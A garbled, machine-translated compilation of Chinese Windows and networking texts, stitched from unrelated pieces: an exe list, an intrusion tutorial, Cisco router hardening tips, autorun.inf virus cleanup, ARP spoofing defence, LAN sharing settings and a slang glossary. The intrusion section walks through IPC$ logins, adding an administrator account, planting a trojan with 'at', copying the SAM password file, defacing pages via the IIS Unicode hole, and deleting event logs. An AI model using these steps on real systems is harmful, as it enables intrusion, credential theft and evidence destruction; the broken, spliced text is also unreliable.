regtrace. . Exe> Options to tune debug options for applications failing to dump trace statements. .
Trace settings.
regwiz. . Exe> Registration Wizard Registration Wizard. .
remrras。.exe > 。.
replace. . Exe> Replace files in the directory with the source replace the target file the same name files in the directory. .
.Exe > Reset reset. an active active portion of the section to reset.
rexec. . Exe> Runs commands on remote hosts running the REXEC service. . REXEC services running on remote computers run commands. rexec command before the specified command to verify the remote computer's user name, and only installed the TCP / IP protocol before they can use this command. .
risetup。.exe > Starts the Remote Installation Service Wizard。. Run the Remote Setup Wizard service.
route. . Exe> display or edit the current routing tables. . Control network routing table. .
Routemon. > no longer supported .exe is no longer supported!.
router. . Exe> Router software that runs either on a dedicated DOS or on an OS / 2 system. . Route software in DOS or OS / 2 system. .
Rsh. Runs commands > .exe on remote hosts running the RSH service running the RSH service to run commands on a remote computer.
rsm. . Exe> Mounts and configures remote system media media remote system configuration. .
Rsnotify. Remote storage notification .exe > recall remote storage notification echo.
rsvp. . Exe> Resource reservation protocol source reservation protocol. .
Runas. RUN a .exe > program as another user allows the user to specify a different permissions to run the tools and procedures.
rundll32. . Exe> Launches a 32-bit dll program start 32-bit DLL procedures. .
Runonce. > Causes a .exe program to run during startup, and then run the program in the start menu.
rwinsta. . Exe> Reset the session subsystem hardware and software to known initial values to reset the session subsystem hardware and software to the original value. .
Savedump. Does not write .exe > to e:\winnt\user. do not write User .dmp. .dmp.
scardsvr. . Exe> Smart Card resource management server child to card management server. .
schupgr。.exe > It will read the schema update files (。.ldf files) and upgrade the schema。. (part of。.
1, NET. .
As long as you have an IP user name and password, then use IPC $ connection do..!
Here we are, if you get the user is hbx, the password is 123456. Suppose the other side IP 127. .0. .0. .1. .
net use \\127。.0。.0。.1\ipc$ 123456 /user:hbx。.
Exit the command is. .
net use \\127。.0。.0。.1\ipc$ /delte。.
The following must login before you can use the method on the landing above. .
Let's talk about how to create a user, because the SA permissions equivalent to the system's root. We added a user password is heibai lovechina.
net user heibai lovechina / add. .
As long as the display command is successful, then we can put him into the Administrator group.
net localgroup Administrators heibai / add. .
Here is the c drive mapping each other, and of course other plates can also be, as long as there is on the list. We here at the other side of the c drive mapped to a local disk, Z.
net use z: \ \ 127. .0. .0. .1 \ C $. .
net start telnet。.
This will open the other side of the TELNET service. .
Here is the Guest user activation, the guest is NT's default user, and cannot be deleted? don't know whether my Windows2000 is to delete it.
Here is a user's password to get rid of, we have guest password to lovechina, other users can. As long as there are rights on the line Yeah! . .
net user guest lovechina。.
net command really strong ah! . .
2、At 。.
An intruder will usually leave the back door after the invasion, which is kind of Trojan horse, and you pass the horse up, how start him? AT commands needed then, assuming that the server that you have landed. The first thing you have to get each other's time. .
net time \\127。.0。.0。.1。.
Will return a time, assuming time was 12:1, now need to create a new job, the ID = 1. .
at \\127。.0。.0。.1 12:3 nc。.exe。.
It is assumed that a Trojan horse, called NC. . EXE, this thing to the other server. .
3, Telnet. .
This command is very useful, it can be done with the remote connection, but the normal need password, the user, but you give each other a Trojan horse that is attached directly to the Trojans open ports.
telnet 127. .0. .0. .1 99. .
So that it can be connected to each other's 99 ports, then you can run commands on the other side, this is the broiler.
4, FTP. .
It can be your things to each other's subnet, you can go to apply for a support FTP upload space, the domestic many, if not found, I gave a www. .51. .NET, good. When we request finished, it will give the user name, password, and the FTP server. In the upload needs to login first, and here we assume that the FTP server is www. .51. .NET, username, password is HUCJS is 654321.
ftp http://www. .51. . Net. .
He will be asked to enter user, after the success will be asked to enter a password.
Said first upload the following, assuming you need to upload the file is INDEX. . HTM, which is located in C: \ Next, spread to the other D: \. .
get c:\index。.htm d:\。.
Suppose you take the other C drive under the INDEX. . HTM, down to the D drive of your machine the next. .
put c:\index。.htm d:\。.
5, Copy. .
Here I talk about how to make a local copy of the file to your hard disk, you need to build a good IPC $ connection is valid. Here we put the local c drive of the .htm to index it.. 127 .0 .0. c: of .1...
copy index. . Htm \ \ 127. .0. .0. .1 \ C $ \ index. . Htm. .
If you want to copy to the D disk C to D,!.
If you put him copied to the WINNT directory, you should enter. .
copy index。.htm \\127。.0。.0。.1\admin$\index。.htm。.
admin $ is winnt. .
To copy the files over the other, by the way, tell them the NT backup database on sam x:\winnt\repair\sam. ._. ._ is the file name for the database. Following the .0 .0.127.. .1 database are copied to the local disk C..
copy \ \ 127. .0. .0. .1 \ Admin $ \ repair \ sam. . _ C: \. .
6、Set 。.
If you ran into a machine, and would like to black him (especially when that thinking can only be allowed to have), of course, he's 80 ports to open, or to whom you black. Then need to use SET command! Here are the results I get! I have to analyze it, just look at that page only. .
COMPUTERNAME=PENTIUMII。.
ComSpec = D: \ WINNT \ system32 \ cmd. . Exe. .
CONTENT_LENGTH=0。.
GATEWAY_INTERFACE = CGI / 1. .1. .
HTTP_ACCEPT=*/*。.
HTTP_ACCEPT_LANGUAGE = zh-cn. .
HTTP_CONNECTION=Keep-Alive。.
HTTP_HOST = current visit by the IP, there was originally to show my IP, was I deleted. .
HTTP_ACCEPT_ENCODING=gzip, deflate。.
HTTP_USER_AGENT = Mozilla / 4. .0 (Compatible; MSIE 5. .0; Windows 98; DigExt). .
NUMBER_OF_PROCESSORS=1。.
Os2LibPath = D: \ WINNT \ system32 \ os2 \ dll;. .
OS=Windows_NT。.
Path = D: \ WINNT \ system32; D: \ WINNT. .
PATHEXT=。.COM;。.EXE;。.BAT;。.CMD。.
PATH_TRANSLATED = E: \ vlroot home page on the address, as long as you see PATH_TRANSLATED = is the home page of the store behind places. .
Site. Here is the E:\vlroot.
PROCESSOR_ARCHITECTURE = x86. .
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel。.
PROCESSOR_LEVEL = 6. .
PROCESSOR_REVISION=0303。.
PROMPT = $ P $ G. .
QUERY_STRING=/c+set。.
REMOTE_ADDR = XX. . XX. . XX. . XX. .
REMOTE_HOST=XX。.XX。.XX。.XX。.
REQUEST_METHOD = GET. .
SCRIPT_NAME=/scripts/。.%2f。./winnt/system32/cmd。.exe。.
SERVER_NAME = XX. . XX. . XX. . XX. .
SERVER_PORT=80。.
SERVER_PORT_SECURE = 0. .
SERVER_PROTOCOL=HTTP/1。.1。.
SERVER_SOFTWARE = Microsoft-IIS / 3. .0 Each other using the IIS / 3. .0. .
SystemDrive=D:。.
SystemRoot = D: \ WINNT. .
TZ=GMT-9。.
USERPROFILE = D: \ WINNT \ Profiles \ Default User. .
windir=D:\WINNT。.
Pink is the other side of that line of home storage address here to tell you a skill, stupid skills ah, but can only use this method to find the home of 100% the name of the directory DIR you will certainly see a lot of file, you can put all files in a browser that input XX. . XX. . XX. . XX / file name, so long as to see and XX. . XX. . XX. . XX see also face the same, then this is the name of the home page. .
7、Nbtstat 。.
If you scan the machine to a NT, he's from 136 to 139 of them opened a port, then the user must use this command to get a. Way to say that this is the netbios, get the user name can guess the password after. For example, simple password, the password and user name the same, are under trial, no crack on the violence in it! . .
Now the Internet many NT loom open these ports, you can practice, we can analyze the results obtained. Command is.
nbtstat-A XX. . XX. . XX. . XX. .
-A must be uppercase Oh, here are the results obtained.
NetBIOS Remote Machine Name Table. .
Name Type Status。.
---------------------------------------------。 .
Registered Registered Registered Registered Registered Registered Registered Reg。.
istered Registered Registered Registered. .
MAC Address = 00-E0-29-14-35-BA。.
PENTIUMII <00> UNIQUE. .
PENTIUMII <20> UNIQUE。.
ORAHOTOWN <00> GROUP. .
ORAHOTOWN <1C> GROUP。.
ORAHOTOWN <1B> UNIQUE. .
PENTIUMII <03> UNIQUE。.
INet ~ Services <1C> GROUP. .
IS~PENTIUMII。.<00> UNIQUE。.
ORAHOTOWN <1E> GROUP. .
ORAHOTOWN <1D> UNIQUE。.
__MSBROWSE__. . <01> GROUP. .
Pink is landing this system user, you may not know how to look, we see a breakthrough digital, as long as this channeling is <03>, he is on the front of the user, the user is a PENTIUMII here..
8, Shutdown. .
Off each other's NT Server command.
Shutdown \ \ IP Address t: 20. .
NT 20 seconds will automatically shut off, think twice before you run this command, on the other side made great loss, want to be a conscientious intruder!.
9, DIR. .
This command will have nothing to say, but it is very important, he is viewing a list of all files and folders. You can try local.
10, Echo. .
Famous vulnerability Unicode, this command can be a simple black this vulnerable hosts. We assume that we want to take the "Nanjing massacre had been established beyond doubt that any *** person shall deny!" writes index., 2 .htm, everyone sees what is the difference between a..
echo of the Nanjing Massacre evidence, no person shall *** deny! > Index. . Htm. .
Echo the Nanjing massacre had been established beyond doubt that any *** person shall deny! >> .htm. index.
The first meaning is the coverage index. . Htm original content, the "Nanjing Massacre evidence, no person shall *** deny!" In the index. . Htm; second meaning is the "Nanjing Massacre evidence, no person shall *** deny!" Added to the index. . Htm inside. .
> The ">" produced by content will be appended to the file, ">" the contents of the original file will be overwritten. You can try local.
You may ask, so simple Heixia What fun fact, he can be used to download the page to the other side of the directory. .
(1) first, we need to apply for a free home page space.
(2) The echo in the directory can write the contents of txt file to establish the following: (in chinren server as an example.). .
Open upload. .chinaren. .com (your FTP server, to apply for your space provider to you).
cnhack (user name when you apply). .
Test (when you apply for password).
get index. . Htm c: \ inetpub \ wwwroot \ index. . Htm. .
(This is your space on the index of. other .htm download c:\inetpub\wwwroot\index. .htm).
bye (exit the FTP dialogue, rather in the 98's DOS, use the EXIT exit DOS). .
Specific practices:.
Enter echo open upload. . Chinaren. . Com> c: \ cnhack. . Txt. .
Enter echo cnhack >> c:\cnhack. .txt.
Enter echo 39abs>> c: \ cnhack. . Txt. .
Enter echo get index. + .htm c:\inetpub\wwwroot\index. .htm >> + c:\cnhack. .txt.
Finally enter the ftp-s: c: \ cnhack. . Txt (using ftp the-s parameter, the implementation of file contents.) Such order is complete, the file has been downloaded to a file you specify. .
Note: to obtain file, remove .txt. cnhack. (If you do not delete, you can easily give other people to see your password. ) Remember to del c:\cnhack. .txt.
11, Attrib. .
This command is to set the file attribute. If you want to check out the black one, while his master file attributes to set a read-only, it is very poor, would like to delete him, trying to cover him. However, don't be afraid of the command.
attrib-r index. . Htm. .
This command is put index. read-only property to remove the .htm. If the "-" to "+" is the file attribute is set to read-only.
attrib + r index. . Htm. .
This command is to index the property settings of the .htm. is read-only.
12, Del. .
When you see this heading don't fall! now leaving .0 .0.127.. .1, you want to delete the log, and, of course, you want to delete the logs! want to catch me, huh, huh. NT log has these.
del C: \ winnt \ system32 \ logfiles \ *. .*. .
del C:\winnt\ssytem32\config\*。.evt。.
del C: \ winnt \ system32 \ dtclog \ *. .*. .
del C:\winnt\system32\*。.log。.
del C: \ winnt \ system32 \ *. . Txt. .
del C:\winnt\*。.txt。.
del C: \ winnt \ *. . Log. .
As long as the deletion of these, some system NT installed on the D disk or other disk shall be replaced by other disk C..
When it comes to configure a new cisco router, most configuration depends on the type of router and it will serve the purpose. However, there are some things you each new cisco router should be configured. .
Which command is what you want on each router Cisco on? each administrator has their own "correct" configuration command on each router.
This is I think you should have configured each router on the list of 10 commands (no particular order). .
Configure a router on the login account.
I strongly recommend to configure routers and switches, a real account user name and password. This means that you need user and password to gain access. .
In addition to this, I suggest to use a secret password, user name, and not a general password. It uses the md5 encryption method to encrypt the password, and greatly improves security. For example, as follows:.
router (config) # username root secret my $ password. .
After you configure a user name, you must enable the use of the user name of the port. For example, as follows:.
router (config) # line con 0. .
router(config-line)# login local。.
router (config) # line aux 0. .
router(config-line)# login local。.
router (config) # line vty 0 4. .
router(config-line)# login local。.
In the router set a host name. .
I guess the router default hostname is the router. You can leave the default value, the router can also be up and running. However, renaming the router and uniquely identify it. For example, as follows:.
router (config) # hostname router-branch-23. .
In addition, you can configure a single domain name on the router, so that it knows which the dns domain. For example, as follows:.
router-branch-23 (config) # ip domain name techrepublic. . Com. .
To set a password to enter privileged mode.
When it comes to setting the password to enter privileged mode, many people think of using the enable password command. However, instead of using this command, I strongly recommend using the enable secret command. .
This command uses the md5 encryption method to encrypt passwords, so prompt does not appear in clear text. For example, as follows:.
router (config) # enable secret my $ password. .
Cryptographic router password.
cisco router default password is not encrypted in the configuration. However, you can easily change this. For example:. .
router(config)# service password-encryption。.
. .
Disable a Web service.
cisco router is also enabled by default web service, it is a security risk. If you do not intend to use it best to shut it down. For example:. .
router(config)# no ip http server。.
Configure dns, or disable the dns lookup. .
Let us discuss cisco router I personally think that's one small problem: by default, if in privileged mode accidentally enter a command, the router that you try to telnet to a remote host. However, it's your input but do DNS lookups.
If you do not configure the router dns, command prompt will hang until the dns lookup failed. For this reason, I recommend using one of the following two methods. .
One option is to disable dns. Practice:.
router (config) # no ip domain-lookup. .
Alternatively, you can correctly configure your dns to point to a true dns server.
router (config) # ip name-server. .
Configure command aliases.
Many network administrators are aware of the router configuration command abbreviation (ie alias). For example:. .
router(config)# alias exec s sh run。.
This means you can now enter s, without having to enter the full show running-configuration command. .
Setting up the router clock, or configure an NTP server.
Most of cisco equipment without internal clock. When they start, they do not know how much. Even if you set the time, if you shut down or restart the router, it does not retain the information. .
First set your time zone and daylight saving time. Examples are as follows:.
router (config) # clock timezone cst -6. .
router(config)# clock summer-time cdt recurring。.
Then, to ensure that the router event messages display the correct time, set the router clock, or configure a ntp server. Set the clock reads as follows:. .
router# clock set 10:54:00 oct 5 2005。.
If you already have an ntp server network (or internet access router), you can order the router to use as a time source. This is your best choice, when the router starts, it will set the clock by ntp server. For example:. .
router(config)# ntp server 132。.163。.4。.101。.
Not to log messages to interrupt you, the configuration process. .
Cisco ios in another I think little trouble is when I configure the router console interface is continually pop up log messages (possibly console port aux port or vty port). To prevent this, you can do so.
Therefore, every port in the line, I use the logging synchronous command. For example:. .
router(config)# line con 0。.
router (config-line) # logging synchronous. .
router(config)# line aux 0。.
router (config-line) # logging synchronous. .
router(config)# line vty 0 4。.
router (config-line) # logging synchronous. .
In addition, you can modify the port on the port's execution timeout time. For example, let's assume you want to disable the vty lines on the default timeout period of ten minutes. In-line configuration mode commands using exec-timeout 0 0, the router will never exit.
Buffer in the router or system log server records system messages. .
Capture the router's errors and events, as well as the monitoring console is the key to solving the problem. By default, the router will not be buffered log events are sent to the router memory.
However, you can configure the router to buffer the event log is sent to memory. For example:. .
router(config)# logging buffered 16384。.
You can also send events to the router to a syslog server. Because the server in the router outside, there is an additional advantage: even if the router will keep the event record of power failure. .
Tell you double-click the drive letter cannot be opened, causes, solutions, complete the precautionary approach. 1 society lives.
Today, I we [the virus Trojan] version to see a post which is written, how to solve the double-C, D, E, F ... ... and so not open solution set, return a lot of friends. Unfortunately, when I went in and found only given a lot of tools but did not write what is causing it, of course, no manual solution, there is no way to completely prevent. So I'll share more about the causes of this problem, the solution, as well as a thorough preventive measures. .
In General, the virus in order to achieve the purpose of their execution will stop at nothing, it will use a variety of tricks to make your own power when you are running at the same time in order to prevent its process being concluded, it will want to own the power state of a variety of normal operations (for example, you double-click to open a letter) to be executed again, so that they can let themselves have been running in memory, in order to reach our base purposes..
ok, open a secret from (the following example the total to D):. .
When you double-click your drive d (the drive letter that will be mentioned later), a little mouse (even the mouse did not change), does not open as usual with this disk, then basically you can congratulate you: why are you poisoning!? why not poisoning you because what causes ice is not clear, but the result is because damn virus for you D root down a file because this file exists, you double-click the D disk when there is no reaction, drive d is not open, or in response to a very long time before they open. This is not a normal signal. . This time you need help right to open D drive: Right-click the D drive, the pop-up menu, select "Open." .
diffence。.JPG (27。.39 KB)。.
2007-1-13 23:38. .
OK, let's get to know some of this damned file, its name is autorun. .inf, you must remember. first of all, we want to find this file. When you double-click to open D set it in the root directory of drive d (similar to the other disk of course). Use the method mentioned above, use the right mouse button to open the drive d after seeing strange, did not find a autorun. . . Inf, and of course, there may be more hidden files, you will be seen. .
system。.JPG (59。.66 KB)。.
2007-1-13 23:38. .
If you find that you cannot modify this place, it must be virus modifies your registry, we can manually restore. Open the registry to remove the right window HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL, original CheckedValue key, create a new type of Dword CheckedValue key and set its value by 1. . .
Then we have to do is direct autorun. double-click to open the .inf look. Under normal circumstances, you will see code like this:.
[Copy to clipboard] [-] CODE:. .
[AutoRun]。.
OPEN = 3c. . Exe. .
shellexecute=3c。.exe。.
shell \ Auto \ command = 3c. . Exe. .
If you are interested in on autorun. .inf to learn more, you can go to the search engines to check the syntax of the autorun. .inf, otherwise you just need to look after the write file OPEN, the file is virus files. Due to the particularities of the autorun. .inf, when you double-click on drive d, the system will first check in drive d has the autorun under. .inf files exist, if any, do it inside the code, and OPEN means to open the program that follows it! so you double-click on drive d, actually perform the virus file again.
ok, now you have to do is to delete the virus file OPEN written, and then delete this autorun. . Inf file, then restart - must restart, D drive to return to normal! If you find after reboot or so, the problem would be a little more complex: the virus in the boot time is automatically executed, and generates a result of the implementation of a new autorun. . Inf, then you need to drive anti-virus, or write according to OPEN the file name back to the search engine to find a solution manual. Of course, this is beyond the contents of this article.。.
Some people ask: So, is there any way to prevent this happen? Because we are usually open directly double-click the drive letter, in particular, U disk, mobile hard disk drives. .
A: of course, complete elimination!.
Then Q: how set up? . .
A: it is very simple, as I do.
By a man named "Group Policy" thing, we can turn off all auto-play drive. So even if there is autorun. . Inf, double-click to open and will not affect our letter. Run gpedit. . Msc will open Group Policy, open the left window and then click Computer Configuration - Administrative Templates - System, and then in the right window find the "turn off auto-play", double click to open this one, select the "Enabled", then choose "All drives", OK! Finally, do not forget to restart. .
gpedit。.JPG (84。.27 KB)。.
2007-1-13 23:38. .
PS: the Windows group policy is definitely worth of one of the things that search engines will have numerous tutorials and tips.
See here, I think you have to understand in the end about how the story. At any time after, when you find double-click can not open any letter, not normal, etc., we should first see if there zutorun. . Inf (remember they are mostly hidden + system properties), I think you already know how to do. .
Last mention why the drive except in the case of? because most of the CD has its own free autorun. .inf and the appropriate program files you put in the disc will automatically run the program, these are normal, except for the case to the CD drive.
As many people have asked why I deleted in accordance with this method, restart found autorun. . Inf file is still, why? Very simple, you just clean out the autorun. . Inf, and it is written inside the back of the OPEN procedure, but in fact these are not a real virus body, the virus body will normally be hidden in the windows directory or system32 directory, they will start automatically at boot time, automatically starts when the checks are autorun . . Inf file is not in, if not automatically generated. So you manually remove the autorun. .。 Antivirus software is a fool, they will give you a clean up the virus, the virus autorun. .inf generated will not be killed, because the file is not a virus. By this time you can be in accordance with this article the method to delete the file, double-click the drive out and open questions.
Reference. .
All operations can be carried out in the CMD window, assuming that the current path is drive d:.
View file attributes: attrib, so that all D root directory of the files, including hidden files and all will appear, as long as the property is SH, is the system + hidden attribute. .
View the autorun. .inf file content: autorun. .inf type, so you can see the contents of the autorun. .inf, OPEN the program behind..
Delete autorun. . Inf: del / f / q / a sh autorun. . Inf. .
Delete virus files: del/f/q/a sh virus filename in the ARP virus solution and related tools.
Internet cafes and business is popular recent ARP virus, leading to a good network and off, to resolve ARP attack method:. .
【 】 Fault reason.
Some people use the LAN ARP cheating Trojans (such as: Legend of hacking software, some of the legendary malicious plug-in also loaded the program). . .
【 】 Fault principle.
To understand the fault principle, let us first look at ARP protocol. . .
In the local area network, the ARP protocol to complete the IP address is converted to a second-tier physical address (i.e. the MAC address). ARP protocol for network security. Through false IP address and MAC address for ARP Spoofing can generate significant network traffic so that network block ARP. 。.
ARP protocol is "Address Resolution Protocol" (ARP) of the abbreviation. In the LAN, the actual transmission network is the "frame", frame which is the target host MAC address. In Ethernet, a host to communicate directly with another host, you need to know the MAC address of target host. But this MAC address is how to get it? It is obtained through the Address Resolution Protocol. The so-called "address resolution" is the host before sending the frame target target IP addresses to MAC addresses of the process.。 。.
Each equipped with TCP / IP protocols ARP cache has a computer table, table of IP address and MAC address is one correspondence, as shown below. . .
The host IP address MAC address.
A 192. .168. .16. .1 Aa-aa-aa-aa-aa-aa . .
B 192。.168。.16。.2 bb-bb-bb-bb-bb-bb 。.
C 192. .168. .16. .3 Cc-cc-cc-cc-cc-cc . .
D 192。.168。.16。.4 dd-dd-dd-dd-dd-dd 。.
We host A (192. .168. .16. .1) To host B (192. .168. .16. .2) To send data as an example. When sending data, the host A's ARP cache in your table to find whether the target IP address. If found, will know the target MAC address, MAC address is written directly to the target frame can be sent inside a; If the ARP cache table does not find the corresponding IP address, host A will send a broadcast on the network the target MAC address is "FF.. FF.. FF.. FF.. FF... .168. .16. .2 of the MAC address is what? "the other hosts on the network and do not respond to ARP queries, only the host B receives the frame to the host to make such A statement:" .168.192. .16. .2 of the MAC address is bb-bb-bb-bb-bb-bb. " Thus, A host will know the MAC address of host b, it can send a message to the host B. It also updates its ARP cache tables, the next time you send a message to the host B, directly from the ARP cache table lookup. . . .
As can be seen from the above, the foundation of the ARP protocol is to trust all of the LAN, you can easily implement in Ethernet ARP Spoofing. To target A spoofing, Ping host A to C are sent to this address DD-DD-DD-DD-DD-DD. If you deceive his C MAC address fraud is A DD-DD-DD-DD-DD-DD, then sent to C becomes the packets on send to D. It's not exactly D to receive A packet sent to sniff it. 。.
A little of this change did not realize it, but the next thing let A had doubts. Because A and C are not on the connection. D A send the received packet to C can not transfer to the C. . .
"Man in the middle", ARP Redirect. Open d IP forwarding, A packet is sent forward to C, like a router. However, if the D sends ICMP redirect if you interrupt the entire plan. 。.
D directly changes the whole package forward, caught A packet sent to C, all the modifications and then forwarded to C, and C receive the packet completely that A is sent from. However, C sends the data packet is directly delivered to A, again on the C if the ARP cheating. Now D is completely become the bridge between A and C, and for communication between A and C can be well aware of. . .
【 】 Symptom.
When a LAN host Trojans to run ARP deception, it will deceive all hosts and routers within the LAN so that all Internet traffic must go through the virus host. Other users had access through a router now directly transferred to the host computer by the virus, when the user switches off the first line. . .
Switch to virus-host on the Internet, if the user has landed: the legend of the host server, then the virus will often forged break false, then the user will have to log back into the legendary host server so that the virus can be ones. 。.
As the Trojans ARP cheating attack will be issued when a large number of data packets cause LAN traffic congestion and their own capacity constraints, the user will feel more and more slow Internet speed. When the ARP cheating Trojans stopped running, the user will resume from the Internet router, switch off the process once again line users. . .
【 HiPER users to quickly find the Trojans: ARP Spoofing.
In the router's "System History" in the information below to see a large number (440 after the router software only version of this tip): . .
MAC Chged 10。.128。.103。.124 。.
MAC Old 00:01:6 c: 36: d1: 7f . .
MAC New 00:05:5d:60:c7:18 。.
The news represents a user's MAC address has changed, the ARP cheating when the horse starts running, all the host of the MAC address of LAN update the virus host MAC address (that is, all information, MAC New addresses are the same as the virus host MAC address ), while in the router's "user statistics" to see all the user's MAC address information are the same. . .
If you are in the router's "the system's history," see Old MAC addresses are inconsistent, then the LAN has seen ARP Spoofing (ARP Spoofing program stops running, host on the router to restore their real MAC address). 。.
【Viruses in the LAN host】 . .
In the above, we know already using ARP Spoofing of the host's MAC address, then we can use NBTSCAN (download address: http://www. .com .cn .utt../upload/nbtscan. .rar) tool to quickly find it. 。.
NBTSCAN can get to the PC's real IP address and MAC address, if any "Trojan Legends" doing strange Trojan can be found with PC-IP / MAC address, and. . .
Command: "nbtscan-r .168.192. .16. .0/24" (to search the entire .168.192. .16. .0/24 segment, that is.
192. .168. .16. .1-192. .168. .16. .254); Or "nbtscan 192. .168. .16. .25-137" Search 192. .168. .16. .25-137 Network segment, that is, 192. .168. .16. .25-192. .168. .16. .137. Output in the first column is the IP address, the last one is the MAC address. . .
Example of use: NBTSCAN.
Suppose find a MAC address "000d870d585f" virus host. . .
1) compression package nbtscan. .exe and .dll extracts cygwin1. to c:. 。.
2) In the Windows Start - Run - Open, type cmd (windows98 enter "command"), in the event of a DOS window, type: C:. .
Btscan-r .168.192. .16. .1/24 (here according to user's actual segments type), a carriage return. 。.
C. .
ocuments and SettingsALAN>C: 。.
btscan-r 192. .168. .16. .1/24 . .
Warning: -r option not supported under Windows。. Running without it。. 。.
Doing NBT name scan for addresses from 192. .168. .16. .1/24 . .
IP address NetBIOS Name Server User MAC address 。.
-------------------------------------------------- ---------------------------- . .
192。.168。.16。.0 Sendto failed: Cannot assign requested address 。.
192. .168. .16. .50 SERVER 00-e0-4c-4d-96-c6 . .
192。.168。.16。.111 LLF ADMINISTRATOR 00-22-55-66-77-88 。.
192. .168. .16. .121 UTT-HIPER 00-0d-87-26-7d-78 . .
192。.168。.16。.175 JC 00-07-95-e0-7c-d7 。.
192. .168. .16. .223 Test123 test123 00-0d-87-0d-58-5f . .
3) by querying the corresponding table identified IP--MAC "000d870d585f" virus host's IP address into the ".168.192. .16. .223." 。.
【Solutions】 . .
1. do not put your network security trust relationships established on the basis of the IP or MAC Foundation, (rarp also spoof issue), the ideal relations should be based on the IP + MAC. 。.
2, set the static MAC -> IP mapping table, not to allow the host to set a good refresh your conversion table. . .
3. unless it is necessary, otherwise it will stop using ARP ARP as permanent entries saved in the corresponding table. 。.
4, using the ARP server. Through the server to find its own ARP translation table in response to other machines ARP broadcast. ARP server to ensure that Taiwan will not be black. . .
5, use the "proxy" proxy IP transmission. 。.
6, shielding the host hardware. Set up your route, to ensure that the legitimate IP address to reach the path. (Static ARP entries configured routing), note the use of switching hubs and bridges can not stop ARP cheating. . .
7, administrators regularly responding IP package a rarp request, and then check the authenticity of the ARP response. 。.
8, the administrator periodically poll to check on the host ARP cache. . .
9, use a firewall to continuously monitor network. Note to use SNMP, ARP Spoofing could lead to trap Pack is missing. 。.
【】 HiPER user solution . .
We recommend that users use two-way binding to resolve and prevent ARP Spoofing. 。.
1, the PC on the router's IP and MAC binding address: . .
1) first of all, access to the router's MAC address within the network (for example, the gateway address HiPER. 192. .16 .168. .254 MAC address for the LAN port on the MAC address 0022aa0022aa >). 。.
2) write a batch file rarp. . Bat as follows: . .
@echo off 。.
arp-d . .
arp -s 192。.168。.16。.254 00-22-aa-00-22-aa 。.
File in the gateway IP address and MAC address changed to your own gateway IP address and MAC address. . .
The batch software onto the "windows-to-start-programs-start".
<%
Select Case Request.form("opt")
Case "Compact" : Call CompactDatabase()
Case "Backup" : Call BackUpDatabase()
Case "DeleteBackup" : Call DeleteBackupDatabase()
Case "Compact&Backup" : CompactDatabase : BackUpDatabase
End Select
%>
-----> NetBEUI Protocol.
10, only use Guest (guest) account. .
Windows XP Guest account to allow others to use your computer, but they are not allowed to access a specific file, nor does it allow them to install the software. On Windows XP Home Edition computer or workgroup in Windows XP Professional computer to access all networks using the guest account. . .
net user guest /active:yes。.
Or open the Control Panel -> User Accounts or in the Administrative Tools -> Computer Management -> Local Users and Groups Open Guest Account. .
11, allow Guest (guest) account access from the network.
Running in input gpedit. . Msc, pop up the Group Policy Manager, in the 'Computer Configuration-Windows Settings - Local Policies - User Rights Assignment', there are "refused access to this computer from the network" policy to prevent access to this computer from the network, if the GUEST account which The solution is to remove the denied access to the GUEST account. .
12, firewall:.
WINXP own firewall to ensure there is no open, open the Local Area Connection Properties -> Advanced, turn off Internet Connection Firewall. If you use a third-party firewall product, reference the user manual to ensure that the firewall does not prohibit the following communication ports: UDP-137, UDP-138, TCP-139, TCP-445 (WIN2K and later operating systems only). .
Windows XP SP2 patches up to date with the latest on the ICF has done very great improvement, more powerful, ICF has its own settings, install SP2, the default, enable ICF firewalls do not allow any external active connection, even if it is local to the application to access network but also need to make settings in the permitted list.
But the firewall blocking the normal Web browsing service communication, the result is people do not see in My Network Places on your computer, is there a method satisfactory to the premise in the opening firewall to allow browsing service. .
Approach is that if you turn on the ICF, opening the property, in the services column, select Add, and Add Services dialog box, four in the edit box, the top is to describe the service name to memory, the second is to apply the IP address or name, enter 127. .0 .0 .1 said... native.
Here are a few internal and external port number, next to the tcp / udp connections that the port is udp or tcp connection. .
In accordance with the form below to enter the three services.
Name of the protocol port. .
NetBIOS Name Service UDP 137。.
NetBIOS Datagram Service UDP 138. .
NetBIOS Session Service TCP 139 。.
137/UDP - NetBIOS name server, network basic input / output system (NetBIOS) Name Server (NBNS) protocol is TCP / IP on a NetBIOS (NetBT) protocol suite as part of its NetBIOS name of the access network based on available hosts Name and address of the mapping method. .
138/UDP--NetBIOS datagram, NetBIOS datagram is the NetBIOS over TCP/IP (NetBT) Protocol part of the family, it is used for network logons and browse.
139/TCP - NetBIOS session service, NetBIOS session service TCP / IP on a NetBIOS (NetBT) protocol suite as part of it for the Server Message Block (SMB), file sharing and printing. .
13. check the RPC, Plug and Play service is started, check the corresponding system folder permissions, re-register the following dynamic link library:.
regsvr32 netshell. . Dll. .
regsvr32 netcfgx。.dll。.
regsvr32 netman. . Dll. .
14, settings, account number and password.
15, there are several ways to access "computer network".
For example, to open the network named "Killer" of the computer, its IP address 192. .168. .1. .8, If you do not know the IP address of other machines, you can use the "PING computer name" to get its IP address. .
Access by computer name, NETBIOS services. Click on the "start" menu, click "run" in the address bar enter "\Killer" and click "OK".
Access with IP address, enter in the address bar type "\ 192. .168. .1. .8", Click "OK." .
Use the search method to access the computer, the computer will need time to update the list, search your computer, you can speed up the update list. Click on the "network places" button in the "search machine", enter the name of the computer, click on the "search now", you can see that you want to access your computer. Double-clicking the right computer name to open it.
The method used to access the mapped drive into DOS mode, enter the "NET VIEW \ killer", Enter Killer on the computer which is what view shared folders, such as D. Enter NET USE Z: \ Killer \ D computer IBM-ZB D mapping the shared folder as H: drive, at the command prompt, type "Z:". You will find that you have a computer connected to the Killer. .
In Web terms 1.
IT mean? . .
IT refers to information technology, that is, the English abbreviation of Information Technology.
BT mean?. .
BT is a kind of P2P sharing software, called "BitTorrent", Chinese name: "flow", also known as "Download", said in the Forum, a BT is the meaning of "Metamorphosis".
DIY mean?. .
DIY is familiar to each computer enthusiasts, Do It Yourself is the English acronym, do-it-yourself production mean, hardware enthusiasts have been commonly known as DIYer.
OEM mean?. .
OEM Original Equipment Manufacturer is the English acronym, meaning the original equipment manufacturer.
BBS mean?. .
BBS Bulletin Board System is the English acronym, is an electronic bulletin board system, now collectively known as the domestic forum..
XP mean?. .
XP, is the English Experience (experience) abbreviation, since Microsoft released windows XP software, become a popular named concept..
ZT mean?. .
Fora common articles marked with the words, novice unreadable zt, but "posted" pinyin initials only.
